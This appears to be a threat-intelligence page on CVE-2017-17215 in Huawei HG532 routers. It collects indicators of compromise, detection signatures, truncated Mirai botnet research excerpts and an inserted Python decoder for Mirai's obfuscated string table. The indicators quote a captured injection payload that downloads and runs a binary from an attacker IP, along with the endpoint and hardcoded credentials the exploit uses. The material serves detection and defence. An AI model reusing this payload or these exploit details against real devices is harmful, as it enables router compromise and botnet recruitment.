CVE-2017-17215
Published 2018-03-20
Priority: P186 high · CVSS 3.0: 8.8
CVSS vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ITW exploit · VulnCheck KEV
Exploited in the wild
EPSS: 78.61% (99.5th percentile)
Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| huawei_technologies_co_ltd | hg532 | — | — |
Detection & IOCs (extracted from sources)
- command: $(/bin/busybox wget -g 178.62.227.13 -l /tmp/binary -r /wrgjwrgjwrg246356356356/hmips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary wget.selfrep.exploit.huawei)$(echo HUAWEIUPNP)
- CVE-2017-17215 exploit targets the Huawei HG532 SOAP endpoint /ctrlt/DeviceUpgrade_1 on port 37215 via HTTP POST with a crafted Authorization Digest header (username="dslf-config", realm="HuaweiHomeGateway") and a command-injection payload in the body using the pattern $(...)$(echo HUAWEIUPNP).
- The string 'HUAWEIUPNP' (via echo HUAWEIUPNP) is a reliable network-level signature for CVE-2017-17215 exploit attempts; detect it in HTTP POST body traffic to port 37215.
- Trend Micro IDS/IPS rule 1134287 'WEB Huawei Home Gateway SOAP Command Execution (CVE-2017-17215)' covers this exploit; use it as a reference signature pattern.
- Fortinet IPS signature 'Huawei.HG532.Remote.Code.Execution' covers CVE-2017-17215 exploitation attempts.
- Yowai (Mirai variant) listens on port 6 for C2 commands; monitor for unexpected inbound/outbound connections on TCP port 6 from IoT devices.
- Mirai variant (Campaign 1/Omni) uses XOR table key 0xBAADF00D and drops iptables rules to block further connections on certain ports after infection; look for iptables DROP rules added by a newly spawned process on IoT devices.
- Botnet exploiting CVE-2017-17215 uses custom UPX packing with unique signatures; scan for UPX-packed ELF binaries with non-standard UPX headers on IoT devices.
- The CVE-2017-17215 exploit requires the attacker to be authenticated (per NVD), but in practice Mirai/Bushido variants supply a hardcoded Digest Authorization header (username='dslf-config', realm='HuaweiHomeGateway') in the exploit payload, effectively bypassing the authentication requirement on default-configured devices.
- The Mirai variant payload server at 178.62.227.13 switched from an open directory listing to hiding file listings on February 22, 2019, while continuing to serve files; direct URL enumeration may no longer work but direct file fetches remain active.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| vulncheck | — | 8.8 | HIGH | — |
GHSA
GHSA-h4hx-pmcg-3856: Huawei HG532 with some customized versions has a remote code execution vulnerability
ghsa_unreviewed · 2022-05-14 · CVE-2017-17215 [HIGH] · CWE-20
Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.
VulnCheck
huawei hg532_firmware Improper Input Validation
vulncheck · 2017 · CVSS 8.8 · CVE-2017-17215 [HIGH]
Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.
Affected: huawei hg532_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://research.checkpoint.com/2017/good-zero-day-skiddie/; https://threatpost.com/huawei-router-vulnerability-used-to-spread-mirai-variant/129238/; https://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/; https://www.netscout.com/b
No detection rules found.
Hackernews
RustDuck Botnet Rebuilds in Rust to Hijack Routers and Servers for DDoS
blogs_hackernews · 2026-06-30 · CVSS 8.8 · CVE-2017-17215 [HIGH]
## RustDuck Botnet Rebuilds in Rust to Hijack Routers and Servers for DDoS
A new two-stage malware family called RustDuck is hijacking home routers, IP cameras, Android boxes, and poorly secured servers, then stitching them into a network built to knock websites and online services offline.
Researchers at QiAnXin's XLab have tracked it since February 2026, and say the real story is not how big it is today, but how fast it is changing.
The end goal is a distributed denial-of-service (DDoS) attack: flooding a target with junk traffic from the infected machines until it buckles.
RustDuck is one more entrant in a crowded field, b
Hackernews
Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet
blogs_hackernews · 2026-04-18 · CVSS 6.3 · CVE-2024-3721 [MEDIUM]
## Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet
Threat actors are exploiting security flaws in TBK DVR and end-of-life (EoL) TP-Link Wi-Fi routers to deploy Mirai botnet variants on compromised devices, according to findings from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42.
The attack targeting TBK DVR devices has been found to exploit CVE-2024-3721 (CVSS score: 6.3), a medium-severity command injection vulnerability affecting TBK DVR-4104 and DVR-4216 digital video recording devices, to deliver a Mirai variant called Nexcorium.
"IoT devices are increasingly prime targets for
Qualys
Mass Campaign of Murdoc Botnet Mirai: A New Variant of Corona Mirai | Qualys
blogs_qualys · 2025-01-21
#### Table of Contents
- Overview of the latest Murdoc Botnet campaign and a historical timeline
- Technical campaign analysis
- Command-and-control analysis
- Murdoc Botnet
- In-depth shell script analysis:
- Affected Countries
- Qualys EDR Coverage
- Conclusion & Recommended Steps to Protect Against the Variant
- IOCs
- IPs
- Contributors:
The Qualys Threat Research Unit has uncovered a large-scale, ongoing operation within the Mirai campaign, dubbed Murdoc Botnet. This variant exploits vulnerabilities targeting AVTECH Cameras and Huawei HG532 routers. It demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks. In this blog, we will explore Murdoc Botnet’s propagation methods and attack vectors.
## Overview of the la
Bleepingcomputer
New Mirai botnet targets industrial routers with zero-day exploits
blogs_bleepingcomputer · 2025-01-07 · CVSS 8.8 · CVE-2024-12856 [HIGH]
## New Mirai botnet targets industrial routers with zero-day exploits
## Bill Toulas
A relatively new Mirai-based botnet has been growing in sophistication and is now leveraging zero-day exploits for security flaws in industrial routers and smart home devices.
Exploitation of previously unknown vulnerabilities started in November 2024, according to Chainxin X Lab researchers who monitored the botnet's development and attacks.
One of the security issues is CVE-2024-12856, a vulnerability in Four-Faith industrial routers that VulnCheck discovered in late December, though it had noticed efforts to exploit it around December 20.
The botnet has been leveraging a zero-day exploit for CVE-2024-12856, impacting Four-Faith routers, alongside other custom exploits for flaws in Neterbit
Fortinet
Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 | FortiGuard Labs
blogs_fortinet · 2024-09-05 · CVSS 9.8 · CVE-2024-36401 [CRITICAL]
FORTIGUARD LABS THREAT RESEARCH
Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401
#### Table of Contents
- Overview
- GOREVERSE
- SideWalk
- Mirai Variant - JenX
- Condi
- CoinMiner
- Conclusion
- Fortinet Protection
- IoC
  - URL
  - IP Address/Hostname
  - Wallet
  - SHA256 Hash
By Cara Lin and Vincent Li | September 05, 2024
Affected Platforms: GeoServer prior to versions 2.23.6, 2.24.4, and 2.25.2
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
GeoServer is an open-source software server written in Java that allows users to share and edit geospatial data. It is the reference implementation of the Open Geospatial Consortium (OGC) Web Feature Service (WFS) and Web Coverage Service (WCS) standards. On July 1, the project maintainers released
Bleepingcomputer
Malware exploits 5-year-old zero-day to infect end-of-life IP cameras
blogs_bleepingcomputer · 2024-08-29 · CVSS 8.7 · CVE-2024-7029 [HIGH]
## Malware exploits 5-year-old zero-day to infect end-of-life IP cameras
## Bill Toulas
The Corona Mirai-based malware botnet is spreading through a 5-year-old remote code execution (RCE) zero-day in AVTECH IP cameras, which have been discontinued for years and will not receive a patch.
The flaw, discovered by Akamai's Aline Eliovich, is tracked as CVE-2024-7029 and is a high-severity (CVSS v4 score: 8.7) issue in the "brightness" function of the cameras, allowing unauthenticated attackers to inject commands over the network using specially crafted requests.
Specifically, the easy-to-exploit flaw lies in the "brightness" argument in the "action=" parameter of the AVTECH cameras' firmware, intended to allow remote adjustments to the brightness of a camera.
The flaw impacts all AVTECH A
Fortinet
The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
blogs_fortinet · 2024-06-25 · CVSS 9.8 [CRITICAL]
FORTIGUARD LABS THREAT RESEARCH
The Growing Threat of Malware Concealed Behind Cloud Services
#### Table of Contents
- UNSTABLE Botnet
- Condi DDoS Botnet
- UDP Flooder and Process Checker
- Skibidi
- Conclusion
- Fortinet Protections
- IOCs
  - C2
  - URLs
  - Files
By Cara Lin and Vincent Li | June 25, 2024
Affected Platforms: Linux Distributions
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Cybersecurity threats are increasingly leveraging cloud services to store, distribute, and establish command and control (C2) servers, such as VCRUMS stored on AWS or SYK Crypter distributed via DriveHQ. This shift in strategy presents significant challenges for detection and prevention, as cloud services provide scalability, anonymity, and resilience that traditional hostin
Fortinet
2022 IoT Threat Review | FortiGuard Labs
blogs_fortinet · 2023-01-13 · CVSS 8.8 [HIGH]
FORTIGUARD LABS THREAT RESEARCH
2022 IoT Threat Review
By Eduardo Altares, Joie Salvio and Roy Tay | January 13, 2023
FortiGuard Labs monitors the IoT botnet threat landscape for new and emerging campaigns. We do this with the assistance of our honeypots we have deployed to capture active attacks in the wild. This article provides insights into the data collected from our monitoring system over the past year.
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Attack Origins
Our distributed honeypot systems allow us to capture and monitor campaigns that are actively targeting IoT devices for infection. In most cases, these devices are turned into bots used to perform Distributed Denial o
Unit42
Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
blogs_unit42 · 2022-05-20 · CVSS 9.8 · CVE-2022-22954 [CRITICAL]
## Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
Ruchna Nigam
Published: May 20, 2022
Tags: High Profile Threats, Vulnerabilities, CVE-2022-22954, CVE-2022-22960, CVE-2022-22972, CVE-2022-22973, VMware
## Executive Summary
On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation. On April 13, they updated their advisory with information that CVE-2022-22954 is being exploited in the wild.
Multiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the last week of April, finally followed by a CISA Alert on May 18. The CISA Alert also calls out CVE-2022-22972 and CVE-2022-22973 – published on the same day and affecting the same products – as being highly likely to be exploited.
Unit 42 has observed numerous instances of CVE-2022-22954 being exploited in the wild. In t
Fortinet
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
blogs_fortinet · 2022-04-01 · CVSS 9.8 [CRITICAL]
FORTIGUARD LABS THREAT RESEARCH
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
By Joie Salvio and Roy Tay | April 01, 2022
Between February and March 2022, our FortiGuard Labs team observed that the Beastmode (aka B3astmode) Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month, with three targeting various models of TOTOLINK routers.
This inclusion of TOTOLINK exploits is especially noteworthy as they were added just a week after the exploit codes were published on GitHub. We previously reported on the MANGA campaign, which similarly adopted exploit code within weeks of their release.
By rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and expan
Fortinet
Critical Apache Log4j Vulnerability Updates | FortiGuard Labs
blogs_fortinet · 2021-12-21 · CVSS 10.0 · CVE-2021-44228 [CRITICAL]
FORTIGUARD LABS THREAT RESEARCH
Critical Apache Log4j Vulnerability Updates
By Shunichi Imano, James Slaughter, and Geri Revay | December 21, 2021
Beginning December 9th, most of the internet-connected world was forced to reckon with a critical new vulnerability discovered in the Apache Log4j framework deployed in countless servers. Officially labeled CVE-2021-44228, but colloquially known as “Log4Shell”, this vulnerability is both trivial to exploit and allows for full remote code execution on a target system. This has earned the vulnerability a CVSS score of 10 – the maximum.
On December 14th, the Apache Software Foundation revealed a second Log4j vulnerability (CVE-2021-45046). It was initially identified as a Denial-of-Service (DoS) vulnerability with a CVSS score of 3.7 and modera
Trendmicro
Transforming IoT Monitoring Data into Threat Defense
blogs_trendmicro · 2020-10-14
Cyber threats
## Transforming IoT Monitoring Data into Threat Defense
To protect its customers even better against cyber threats, Trend Micro uses the Indicators of Compromise collected from IoT attacks to improve its threat detection capability.
By: Shimamura Makoto, Oct 14, 2020
Original article by Shimamura Makoto, Senior Security Specialist
Trend Micro's 2020 midyear security report shows a 70 percent increase in attacks on devices and routers compared with the second half of 2019. This includes attacks on Internet of Things (IoT) systems, whose growing frequency is worrying. Trend Micro's security researchers monitor the trends in these attacks and examined
Trendmicro
Transforming IoT Monitoring Data into Threat Defense
blogs_trendmicro · 2020-10-08
IoT
# Transforming IoT Monitoring Data into Threat Defense
In this article, we feature data gathered from our continuous monitoring of C&C servers of botnets such as Mirai and Bashlite. We also share how this data is used to bolster the protection of IoT devices.
By: Shimamura Makoto, 2020/10/08
In our midyear roundup report, we shared that in the first half of 2020, there was a 70% increase in inbound attacks on devices and routers compared with the second half of 2019. This data includes attacks on Internet of Things (IoT) systems, which remain alarming and prevalent.
With the aim of protecting customers effectively by continuously monitoring trends in IoT attacks, we examined Mirai and Bashlite (aka Qbot), two notorious IoT botnet malware types th
Tenable
How VPR Helped Prioritize the Most Dangerous CVEs in 2019
blogs_tenable · 2020-04-30
Trendmicro
Mirai Variants Target Video Surveillance Systems
blogs_trendmicro · 2020-02-06 · CVSS 9.8 [CRITICAL]
Exploitation of vulnerabilities
## Mirai Variants Target Video Surveillance Systems
Security researchers at Trend Micro have found two variants of the Internet of Things (IoT) malware Mirai. They use new propagation methods and gain access through a vulnerability in video surveillance storage systems.
By: Trend Micro, Feb 06, 2020
By Trend Micro
Security researchers at Trend Micro have found two variants of the Internet of Things (IoT) malware Mirai. The two variants, SORA (IoT.Linux.MIRAI.DLEU) and UNSTABLE (IoT.Linux.MIRAI.DLEV), use new propagation methods and gain access through the vulnerability CVE-2020-6756 in Rasilient PixelStor5000 video surveillance storage systems.
Mirai is a piece of malware that
Unit42
Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
blogs_unit42 · 2019-10-31 · CVSS 9.8 [CRITICAL]
## Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
Asher Davila
Published: October 31, 2019
Tags: Cybercrime, Threat Research, Vulnerabilities, Botnet, DDoS, Exploit kit, IoT, WiFi routers
## Executive Summary
In September 2019, during the proactive IoT threat-hunting process conducted daily by the Unit 42 (formerly Zingbox security research) team, we discovered an updated Gafgyt variant attempting to infect IoT devices; specifically small office/home wireless routers of known commercial brands like Zyxel, Huawei, and Realtek. This Gafgyt variant is a competing botnet to the JenX botnet, which also uses remote code execution exploits to gain access and recruit routers into botnets to attack gaming servers - most notably those running the Valve Source engine - and cause a Denial of Service (DoS). This variant also competes against similar botnets, which we have found are frequently sold on Instagram. According to Shodan scans, there are more than 32,000 WiFi routers potentia
Trendmicro
Neko, Mirai and Bashlite Target Routers, Devices
blogs_trendmicro · 2019-08-13
# Neko, Mirai and Bashlite Target Routers, Devices
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
By: Augusto Remillano II, Jakub Urbanec, Aug 13, 2019
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlis
Trendmicro
New Mirai Variant Uses Multiple Exploits
blogs_trendmicro · 2019-05-23
Exploits & Vulnerabilities
# New Mirai Variant Uses Multiple Exploits
We discovered a new variant of Mirai that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities.
By: Augusto Remillano II, Jakub Urbanec, May 23, 2019
We discovered a new variant of Mirai (detected as Backdoor.Linux.MIRAI.VWIPT) that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities. However, this case stands out as the first to have used all 13 exploits together in a single campa
Unit42
Mirai Compiled for New Processors Surfaces in the Wild
blogs_unit42 · 2019-04-08
## Mirai Compiled for New Processors Surfaces in the Wild
Ruchna Nigam
Published: April 8, 2019
Tags: Malware, Threat Research, Botnet, DDoS, IoT, Linux, Mirai
## Executive Summary
In late February 2019, Unit 42 discovered Mirai samples compiled for new processors/architectures not previously seen before. Despite the source code being publicly released in October of 2016, the malware has, until now, only been found targeting a fixed set of processors/architectures.
Unit 42 has found the newly discovered samples are compiled for Altera Nios II, OpenRISC, Tensilica Xtensa, and Xilinx MicroBlaze processors. This is not the first time Mirai has been expanded for new processor architectures, samples targeting ARC CPUs were discovered in January 2018. Yet this development shows that Mirai developers continue to actively innovate, targeting a growing array of IoT devices. The malware gained notoriety in 2016 for its use in massive denial of service att
Trendmicro
UPnP-enabled Home Devices and Vulnerabilities
blogs_trendmicro · 2019-03-06
# UPnP-enabled Home Devices and Vulnerabilities
With UPnP convenience come security holes that range from attackers gaining control of devices to bypassing firewall protections. We looked into UPnP-related events in home networks and found that many users still have UPnP enabled in their devices.
By: Tony Yang, Mar 06, 2019
Earlier this year, users of Chromecast streaming dongles, Google Home devices, and smart TVs were inundated with a message promoting YouTuber PewDiePie’s channel. The hijacking is said to be part of an ongoing subscriber count battle on the video sharing site. The hackers behind it reportedly took advantage of poorly configured routers that had the Universal Plug and Play (UPnP) service enabled, which caused the routers to forward publ
Trendmicro
Botnets Exploit ThinkPHP Vulnerability to Spread (original title: Botnets nutzen ThinkPHP-Schwachstelle zur Verbreitung)
blogs_trendmicro·2019-01-30·CVSS 9.8
[CRITICAL] Botnets Exploit ThinkPHP Vulnerability to Spread
Exploitation of Vulnerabilities
## Botnets Exploit ThinkPHP Vulnerability to Spread
Cybercriminals can easily abuse Hakai and Yowai to hijack web servers and attack websites.
By: Augusto Remillano II Jan 30, 2019
Original post by Augusto Remillano II
A new Mirai variant, Yowai, and the Gafgyt variant Hakai exploit a vulnerability (patched in December 2018) in the open-source PHP framework ThinkPHP to spread a botnet via websites built with the framework. The cybercriminals use the framework to launch dictionary attacks against default credentials and then gain access to web servers. The goal is distributed denial-of-service (DDoS) attacks. Telemetry data showed that these
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
## ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II 2019/01/25
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks (DDoS). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from January
Trendmicro
Miori IoT Botnet Delivered via ThinkPHP Exploit
blogs_trendmicro·2018-12-20
Miori IoT Botnet Delivered via ThinkPHP Exploit
Malware
# Miori IoT Botnet Delivered via ThinkPHP Exploit
We analyzed another Mirai variant called “Miori,” which is being spread through a Remote Code Execution (RCE) vulnerability in the PHP framework, ThinkPHP.
By: Augusto Remillano II, Mark Vicente
2018/12/20
The exploitation of vulnerabilities in smart devices has been a persistent problem for many internet of things (IoT) users. Perhaps the most infamous IoT threat is the constantly evolving Mirai malware, which has been used in many past campaigns that compromised devices with default or weak credentials. Different Mirai variants and derivatives have cropped up since its source code was leaked in 2016.
We analyzed another Mirai variant called “Miori,” which is being spread through a Remote Cod
Fortinet
DDoS-for-Hire Service Powered by Bushido Botnet
blogs_fortinet·2018-10-26
DDoS-for-Hire Service Powered by Bushido Botnet
FORTIGUARD LABS THREAT RESEARCH
DDoS-for-Hire Service Powered by Bushido Botnet
By Rommel Joven and Evgeny Ananin | October 26, 2018
Distributed Denial-of-Service (DDoS) service offerings, often disguised as legitimate “booter” or “stresser” services, continue to increase in the cyber underground market. This relatively new Crime-as-a-Service trend has created an entry point for novice DDoS attackers, offering a simple option to anonymously attack nearly any website and forcing it offline for a small fee.
Sadly, due to the public release of the source code of some popular bots, building a botnet to provide these services is simpler than ever. A quick Google search returns lists of resources for botnet builders, usually with complete step-by-step instructions. Being able to re-use and ev
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
CVE-2017-5638 [CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
## Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Ruchna Nigam
Published: September 9, 2018
Tags: Malware, Threat Research, Vulnerabilities, Apache Struts, BlackNurse, Botnet, CVE-2017-5638, CVE-2018-9866, Exploits, Gafgyt, IoT, Linux, Mirai, SonicWall RCE
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
- The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
- The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
These developments suggest these IoT botnets are increasingly targeting enterprise devices with outdated versions.
All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices. For Palo Alto Networks cust
Unit42
Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
blogs_unit42·2018-07-20·CVSS 9.8
[CRITICAL] Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
## Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
Ruchna Nigam
Published: July 20, 2018
Tags: Malware, Threat Research, Botnet, DDoS, Exploits, Gafgyt, Hakai, IoT, Linux, Mirai, Okane, Omni
The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated Lua environment that incorporated nine exploits in its code.
In their newest evolution, samples also target the D-Link DSL-2750B OS Command Injection vulnerability, only a few weeks after the publication of its Metasploit module on the 25th of May (even though the vulnerability has been public knowledge since February of 2016).
While exploring sa
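The campaigns in this Unit 42 post, like Satori, Miori and the other variants on this page, are built on the leaked Mirai source, which keeps its C2 hostname, scanner credentials and other strings in an obfuscated table (table.c) rather than in the clear. The block below is an added example, not code from Unit 42 and not the Mirai source itself: it re-implements that scheme, a 4-byte key whose four bytes are XORed one after another into every byte of each entry, with entries stored together with their terminating NUL. The key constant 0xDEADBEEF is the one in the leaked source; variants typically change only that constant. SAMPLE_TABLE and its strings are constructed for this example and are not from any real sample.

```python
"""Mirai string-table obfuscation: encode, decode and recover the key.
Added example; not code from Unit 42 and not the Mirai source tree. It follows the
scheme of table.c in the leaked Mirai source. SAMPLE_TABLE is constructed, not carved
from a real sample."""
import string

MIRAI_DEFAULT_KEY = 0xDEADBEEF  # table_key in the leaked source; variants change it
PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}


def effective_key_byte(key):
    """Four successive single-byte XORs collapse to one XOR byte, so the
    2^32 key space yields only 256 distinct transformations."""
    k = [(key >> shift) & 0xFF for shift in (0, 8, 16, 24)]
    return k[0] ^ k[1] ^ k[2] ^ k[3]


def toggle_obf(data, key=MIRAI_DEFAULT_KEY):
    """Mirai's toggle_obf(): one call encodes, a second call decodes."""
    kb = effective_key_byte(key)
    return bytes(b ^ kb for b in data)


def encode_entry(text, key=MIRAI_DEFAULT_KEY):
    """Entries are stored with their terminating NUL, as the bot keeps them."""
    return toggle_obf(text.encode("ascii") + b"\x00", key)


def decode_entry(blob, key_byte):
    """Undo the XOR with a recovered single key byte and strip the NUL."""
    return bytes(b ^ key_byte for b in blob).rstrip(b"\x00").decode("ascii", "replace")


def recover_key_byte(blob):
    """The encoded NUL at the end of an entry is the effective key byte itself.
    Returns None unless the rest of the entry then decodes to printable ASCII."""
    kb = blob[-1]
    if all((b ^ kb) in PRINTABLE for b in blob[:-1]):
        return kb
    return None


def brute_force_key_bytes(blob):
    """For variants that drop the NUL terminator: every single-byte key under
    which the blob decodes to printable ASCII (usually one, once the entry is
    longer than a few bytes)."""
    return [kb for kb in range(256) if all((b ^ kb) in PRINTABLE for b in blob)]


def decode_table(blobs):
    """Recover the key byte from the first entry, then decode the whole table."""
    kb = recover_key_byte(blobs[0])
    if kb is None:
        raise ValueError("first entry is not NUL-terminated printable text")
    return [decode_entry(blob, kb) for blob in blobs]


# Constructed table, obfuscated with a non-default key as a variant would do.
SAMPLE_TABLE = [encode_entry(s, 0x12345678)
                for s in ("cnc.example.test", "/bin/busybox", "root", "admin")]

if __name__ == "__main__":
    print("effective key byte of 0xDEADBEEF: 0x%02x" % effective_key_byte(MIRAI_DEFAULT_KEY))
    for entry in decode_table(SAMPLE_TABLE):
        print(entry)
```

Because the four XORs reduce to one byte, and that byte is sitting in the clear as the last byte of every NUL-terminated entry, a changed key constant costs an analyst nothing: carve the entries out of a sample's data section and run decode_table over them to get the C2 domain and credential list without touching the key at all.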
Fortinet
Satori Adds Known Exploit Chain to Enslave Wireless IP Cameras
blogs_fortinet·2018-02-02
Satori Adds Known Exploit Chain to Enslave Wireless IP Cameras
FORTIGUARD LABS THREAT RESEARCH
Satori Adds Known Exploit Chain to Enslave Wireless IP Cameras
By David Maciejak, Jasper Manuel and Rommel Joven | February 02, 2018
Satori, a Mirai based IoT bot, has been one of the most actively updated exploits in recent months. It is believed that the hacker behind this bot is also the author of other Mirai variants, known as Okiru, and Masuta.
FortiGuard Labs researchers recently observed a new Satori version that had added a known exploit chain (one which had been used in the past by the Persirai bot) to enable it to spread to vulnerable devices, particularly, wireless IP cameras that run a vulnerable custom version of the GoAhead web server. This exploit chain targets two vulnerabilities. One, discovered by Istvan Toth and which was detailed in th
Unit42
IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
blogs_unit42·2018-01-11·CVSS 9.8
CVE-2014-8361 [CRITICAL] IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
## IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
Cong Zheng, Claud Xiao, Yanhui Jia
Published: January 11, 2018
Tags: Malware, Threat Research, Vulnerabilities, Botnet, IoT, Mirai, Satori, Zero-day
Summary
In early December 2017, 360 Netlab discovered a new malware family which they named Satori. Satori is a derivative of Mirai and exploits two vulnerabilities: CVE-2014-8361, a code execution vulnerability in the miniigd SOAP service in the Realtek SDK, and CVE-2017-17215, a newly discovered vulnerability in Huawei’s HG532e home gateway patched in early December 2017.
Palo Alto Networks Unit 42 investigated Satori, and from our intelligence data, we have found there are three Satori variants. The first of these variants appeared in April 2017, eight months before these most recent attacks.
We also found evidence indicating that the version of Satori exploiting CVE-2017-17215 was active in late November 2017, before Huawei patched the vulnerability. This means that this version of Satori
Checkpoint
Huawei Home Routers in Botnet Recruitment
blogs_checkpoint·2017-12-21·CVSS 8.8
CVE-2017-17215 [HIGH] Huawei Home Routers in Botnet Recruitment
## Huawei Home Routers in Botnet Recruitment
A Zero-Day vulnerability (CVE-2017-17215) in the Huawei home router HG532 has been discovered by Check Point Researchers, and hundreds of thousand
Greynoiseio
NoiseLetter
blogs_greynoiseio
Greynoiseio
GreyNoise Intelligence Publishes Second Annual Retrospective to Help International Cybersecurity Community Defend Against Internet Exploitation
blogs_greynoiseio
Threat Intel
Nexus Zeta
threat_intel
Nexus Zeta
# Threat Actor: Nexus Zeta
## Description
Nexus Zeta is no stranger when it comes to implementing SOAP-related exploits. The threat actor has already been observed implementing two other known SOAP-related exploits, CVE-2014-8361 and CVE-2017-17215, in his Satori botnet project. A third SOAP exploit, the TR-069 bug, has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP-related exploit discovered in the wild in IoT botnets.
## Associated Malware Families (1)
elf.masuta
Published 2018-03-20
Exploited in the wild